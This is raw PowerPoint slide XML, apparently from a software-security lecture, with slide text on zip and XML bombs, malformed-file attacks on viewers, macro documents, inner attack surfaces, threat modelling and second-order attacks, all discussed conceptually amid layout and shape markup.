            <a:ext cx="7761288" cy="4960144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</a:rPr>
              <a:t>Just to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zip or XML bomb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40 Kb zip file can expands to 4GB when unzipped - aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zip of death</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1Kb XML file can expand to 3 GB when XML parser expands recursive definitions as part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>canonicalisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="16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</a:rPr>
              <a:t>To take over control in more interesting ways:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.exe file</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malformed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> PDF file to exploit flaw in PDF viewer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malformed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> PNG file to exploit flaw in PNG viewer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malformed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XXX file to exploit flaw in XXX viewer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp. for complex file formats with viewers in memory-unsafe languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Word or Excel document with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>old-time favourite,  harder to get working due to tighter settings &amp; taint tracking of downloaded files (with the “Mark of the Web”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="16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23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04195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B131-60FA-4CBD-05ED-B0EA44D3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9EB45-32F9-9D15-3FAB-150174A10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Understanding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> is first step in threat modelling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800" dirty="0"/>
              <a:t>in addition to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>outer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  attack surface, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>there are usually also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  attack surfaces deeper inside the application </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> the SQL database in case of SQLi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="16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For good threat modelling you want to consider the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>architecture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> of the application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EFD6A-2E8B-DD69-3288-4D34189260F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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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EDB9978-C235-781D-4DCD-6BF563E92747}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="748878" y="293687"/>
            <a:ext cx="7761288" cy="615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92125" rtl="0" eaLnBrk="0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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="ctr" defTabSz="492125" rtl="0" eaLnBrk="0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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="ctr" defTabSz="492125" rtl="0" eaLnBrk="0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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr" defTabSz="492125" rtl="0" eaLnBrk="0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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr" defTabSz="492125" rtl="0" eaLnBrk="0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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" algn="ctr" defTabSz="492125" rtl="0" fontAlgn="base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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="64" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" algn="ctr" defTabSz="492125" rtl="0" fontAlgn="base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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="64" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" algn="ctr" defTabSz="492125" rtl="0" fontAlgn="base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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="64" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" algn="ctr" defTabSz="492125" rtl="0" fontAlgn="base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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="64" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inner attack surfaces  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A diagram of a cloud storage system&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49671B65-D894-9C3D-6B3A-90570E905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604817"/>
            <a:ext cx="4296394" cy="238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87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76226"/>
            <a:ext cx="7907536" cy="687656"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Overlooked attack surfaces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5800" y="1052736"/>
            <a:ext cx="7761288" cy="5032153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Malicious input can come from unexpected, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘trusted’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>sources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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Tijdelijke aanduiding voor inhoud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2" t="25615" r="13767" b="24757"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="1700808"/>
            <a:ext cx="1636152" cy="845345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939" y="1914572"/>
            <a:ext cx="2247517" cy="3066189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3474139"/>
            <a:ext cx="2346490" cy="2346490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41718CD-729C-ED3B-6B51-0BDB6722CE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" t="-3692" r="-2513" b="-2848"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="635498" y="2827930"/>
            <a:ext cx="3756550" cy="306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832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Overlooked attack surfaces:  2-nd order attacks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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Afgeronde rechthoek 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2548845" y="1595378"/>
            <a:ext cx="2876580" cy="2966025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GB" sz="1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Application</a:t>
            </a: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18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Afgeronde rechthoek 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6216245" y="1831274"/>
            <a:ext cx="1810263" cy="2020056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GB" sz="1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Another </a:t>
            </a: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GB" sz="1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application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="C:\Users\erikpoll\Desktop\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88" y="1862614"/>
            <a:ext cx="774968" cy="74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28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1574042" y="2094206"/>
            <a:ext cx="886651" cy="2875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2177" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1236502" y="1798051"/>
            <a:ext cx="1517522" cy="35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814" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1814" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rechthoek 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2473172" y="2009636"/>
            <a:ext cx="151346" cy="51451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92125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20" name="Rechthoek 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5374871" y="2289907"/>
            <a:ext cx="151346" cy="514512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92125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30" name="Afgeronde rechthoek 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6235661" y="3971375"/>
            <a:ext cx="1770098" cy="1676487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GB" sz="1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Another </a:t>
            </a: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GB" sz="1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application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Vrije vorm 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2616217" y="1831274"/>
            <a:ext cx="2810780" cy="691410"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2910724"/>
              <a:gd name="connsiteY0" fmla="*/ 434521 h 785713"/>
              <a:gd name="connsiteX1" fmla="*/ 216385 w 2910724"/>
              <a:gd name="connsiteY1" fmla="*/ 448481 h 785713"/>
              <a:gd name="connsiteX2" fmla="*/ 376928 w 2910724"/>
              <a:gd name="connsiteY2" fmla="*/ 357739 h 785713"/>
              <a:gd name="connsiteX3" fmla="*/ 272226 w 2910724"/>
              <a:gd name="connsiteY3" fmla="*/ 197195 h 785713"/>
              <a:gd name="connsiteX4" fmla="*/ 369948 w 2910724"/>
              <a:gd name="connsiteY4" fmla="*/ 8731 h 785713"/>
              <a:gd name="connsiteX5" fmla="*/ 614254 w 2910724"/>
              <a:gd name="connsiteY5" fmla="*/ 57592 h 785713"/>
              <a:gd name="connsiteX6" fmla="*/ 593313 w 2910724"/>
              <a:gd name="connsiteY6" fmla="*/ 287937 h 785713"/>
              <a:gd name="connsiteX7" fmla="*/ 607273 w 2910724"/>
              <a:gd name="connsiteY7" fmla="*/ 490362 h 785713"/>
              <a:gd name="connsiteX8" fmla="*/ 746876 w 2910724"/>
              <a:gd name="connsiteY8" fmla="*/ 546203 h 785713"/>
              <a:gd name="connsiteX9" fmla="*/ 921380 w 2910724"/>
              <a:gd name="connsiteY9" fmla="*/ 392640 h 785713"/>
              <a:gd name="connsiteX10" fmla="*/ 1158705 w 2910724"/>
              <a:gd name="connsiteY10" fmla="*/ 636945 h 785713"/>
              <a:gd name="connsiteX11" fmla="*/ 1577515 w 2910724"/>
              <a:gd name="connsiteY11" fmla="*/ 427541 h 785713"/>
              <a:gd name="connsiteX12" fmla="*/ 1828800 w 2910724"/>
              <a:gd name="connsiteY12" fmla="*/ 546203 h 785713"/>
              <a:gd name="connsiteX13" fmla="*/ 2198748 w 2910724"/>
              <a:gd name="connsiteY13" fmla="*/ 643925 h 785713"/>
              <a:gd name="connsiteX14" fmla="*/ 2198748 w 2910724"/>
              <a:gd name="connsiteY14" fmla="*/ 127394 h 785713"/>
              <a:gd name="connsiteX15" fmla="*/ 2457014 w 2910724"/>
              <a:gd name="connsiteY15" fmla="*/ 57592 h 785713"/>
              <a:gd name="connsiteX16" fmla="*/ 2638498 w 2910724"/>
              <a:gd name="connsiteY16" fmla="*/ 225116 h 785713"/>
              <a:gd name="connsiteX17" fmla="*/ 2561716 w 2910724"/>
              <a:gd name="connsiteY17" fmla="*/ 420560 h 785713"/>
              <a:gd name="connsiteX18" fmla="*/ 2415133 w 2910724"/>
              <a:gd name="connsiteY18" fmla="*/ 560163 h 785713"/>
              <a:gd name="connsiteX19" fmla="*/ 2624537 w 2910724"/>
              <a:gd name="connsiteY19" fmla="*/ 762588 h 785713"/>
              <a:gd name="connsiteX20" fmla="*/ 2840922 w 2910724"/>
              <a:gd name="connsiteY20" fmla="*/ 783528 h 785713"/>
              <a:gd name="connsiteX21" fmla="*/ 2910724 w 2910724"/>
              <a:gd name="connsiteY21" fmla="*/ 783528 h 785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10724" h="785713">
                <a:moveTo>
                  <a:pt x="0" y="434521"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="76782" y="447899"/>
                  <a:pt x="153564" y="461278"/>
                  <a:pt x="216385" y="448481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="279206" y="435684"/>
                  <a:pt x="367621" y="399620"/>
                  <a:pt x="376928" y="357739"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="386235" y="315858"/>
                  <a:pt x="273389" y="255363"/>
                  <a:pt x="272226" y="197195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="271063" y="139027"/>
                  <a:pt x="312943" y="31998"/>
                  <a:pt x="369948" y="8731"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426953" y="-14536"/>
                  <a:pt x="577027" y="11058"/>
                  <a:pt x="614254" y="57592"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="651482" y="104126"/>
                  <a:pt x="594477" y="215809"/>
                  <a:pt x="593313" y="287937"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="592150" y="360065"/>
                  <a:pt x="581679" y="447318"/>
                  <a:pt x="607273" y="490362"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="632867" y="533406"/>
                  <a:pt x="694525" y="562490"/>
                  <a:pt x="746876" y="546203"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="799227" y="529916"/>
                  <a:pt x="852742" y="377516"/>
                  <a:pt x="921380" y="392640"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="990018" y="407764"/>
                  <a:pt x="1049349" y="631128"/>
                  <a:pt x="1158705" y="636945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1268061" y="642762"/>
                  <a:pt x="1465833" y="442665"/>
                  <a:pt x="1577515" y="427541"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1689198" y="412417"/>
                  <a:pt x="1725261" y="510139"/>
                  <a:pt x="1828800" y="546203"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1932339" y="582267"/>
                  <a:pt x="2137090" y="713727"/>
                  <a:pt x="2198748" y="643925"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2260406" y="574124"/>
                  <a:pt x="2155704" y="225116"/>
                  <a:pt x="2198748" y="127394"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2241792" y="29672"/>
                  <a:pt x="2383722" y="41305"/>
                  <a:pt x="2457014" y="57592"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2530306" y="73879"/>
                  <a:pt x="2621048" y="164621"/>
                  <a:pt x="2638498" y="225116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2655948" y="285611"/>
                  <a:pt x="2598944" y="364719"/>
                  <a:pt x="2561716" y="420560"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2524489" y="476401"/>
                  <a:pt x="2404663" y="503158"/>
                  <a:pt x="2415133" y="560163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2425603" y="617168"/>
                  <a:pt x="2553572" y="725361"/>
                  <a:pt x="2624537" y="762588"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2695502" y="799815"/>
                  <a:pt x="2793224" y="780038"/>
                  <a:pt x="2840922" y="783528"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2888620" y="787018"/>
                  <a:pt x="2899672" y="785273"/>
                  <a:pt x="2910724" y="783528"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/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92125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0" name="Rechthoek 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6192924" y="2339292"/>
            <a:ext cx="151346" cy="51451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92125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1" name="Rechthoek 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334620" y="2899585"/>
            <a:ext cx="136120" cy="432611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92125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2" name="Rechthoek 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6175806" y="2932539"/>
            <a:ext cx="148212" cy="481558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92125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38" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5448037" y="2957253"/>
            <a:ext cx="717331" cy="38238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2177" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5522009" y="2381719"/>
            <a:ext cx="713652" cy="38238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2177" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Rechthoek 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5723155" y="2476788"/>
            <a:ext cx="144000" cy="15469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1" tIns="45715" rIns="91431" bIns="45715"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="492074" eaLnBrk="1" hangingPunct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en-GB"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4" name="Rechthoek 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5751273" y="3058090"/>
            <a:ext cx="144000" cy="15469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1" tIns="45715" rIns="91431" bIns="45715"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="492074" eaLnBrk="1" hangingPunct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en-GB"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7" name="Rechthoek 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6165368" y="4390516"/>
            <a:ext cx="155505" cy="52261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92125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7" name="Explosie 2 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5910760" y="4494240"/>
            <a:ext cx="698614" cy="334044"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF66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1" tIns="45715" rIns="91431" bIns="45715"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="492074" eaLnBrk="1" hangingPunct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en-GB"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6" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2399366">
            <a:off x="5309910" y="4055788"/>
            <a:ext cx="919167" cy="35403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2177" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Rechthoek 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2400000">
            <a:off x="5722332" y="4191314"/>
            <a:ext cx="144000" cy="15469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1" tIns="45715" rIns="91431" bIns="45715"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="492074" eaLnBrk="1" hangingPunct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en-GB"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18" name="Vrije vorm 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3037589" y="2752630"/>
            <a:ext cx="2316188" cy="1654077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 2316188 w 2316188"/>
              <a:gd name="connsiteY0" fmla="*/ 409379 h 2387001"/>
              <a:gd name="connsiteX1" fmla="*/ 1708915 w 2316188"/>
              <a:gd name="connsiteY1" fmla="*/ 276756 h 2387001"/>
              <a:gd name="connsiteX2" fmla="*/ 1171443 w 2316188"/>
              <a:gd name="connsiteY2" fmla="*/ 46411 h 2387001"/>
              <a:gd name="connsiteX3" fmla="*/ 431547 w 2316188"/>
              <a:gd name="connsiteY3" fmla="*/ 32451 h 2387001"/>
              <a:gd name="connsiteX4" fmla="*/ 780555 w 2316188"/>
              <a:gd name="connsiteY4" fmla="*/ 402399 h 2387001"/>
              <a:gd name="connsiteX5" fmla="*/ 1548371 w 2316188"/>
              <a:gd name="connsiteY5" fmla="*/ 597843 h 2387001"/>
              <a:gd name="connsiteX6" fmla="*/ 1443669 w 2316188"/>
              <a:gd name="connsiteY6" fmla="*/ 1051553 h 2387001"/>
